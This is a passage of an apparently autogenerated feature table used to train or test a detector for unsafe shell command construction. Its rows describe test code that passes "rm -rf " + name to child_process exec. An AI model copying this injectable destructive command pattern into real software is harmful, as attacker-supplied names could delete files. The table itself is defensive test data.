autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:6:123:22 | !isSafeName(name) | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:6:123:22 | !isSafeName(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:16 | isSafeName | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:16 | isSafeName | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:16 | isSafeName | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:16 | isSafeName | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:16 | isSafeName | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | exceptional return of isSafeName(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | exceptional return of isSafeName(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | exceptional return of isSafeName(name) | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | exceptional return of isSafeName(name) | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | exceptional return of isSafeName(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | isSafeName(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | isSafeName(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | isSafeName(name) | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | isSafeName(name) | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | isSafeName(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:3 | cp | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:3 | cp | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:8 | cp.exec | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | cp.exec ... + name) | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:5:126:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:5:126:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:5:126:8 | exec | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:5:126:8 | exec | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:5:126:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:18 | "rm -rf " | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:10:126:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:22:126:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:22:126:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:22:126:25 | name | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:22:126:25 | name | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:22:126:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:22:126:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:1:140:1 | Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:1:140:1 | Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:1:140:1 | Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:1:140:1 | class C ... ed\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:1:140:1 | class C ... ed\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:1:140:1 | class C ... ed\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:7:129:10 | Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:7:129:10 | Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:129:7:129:10 | Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:130:4 | wha | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:130:4 | wha | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:130:4 | wha | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:132:2 | 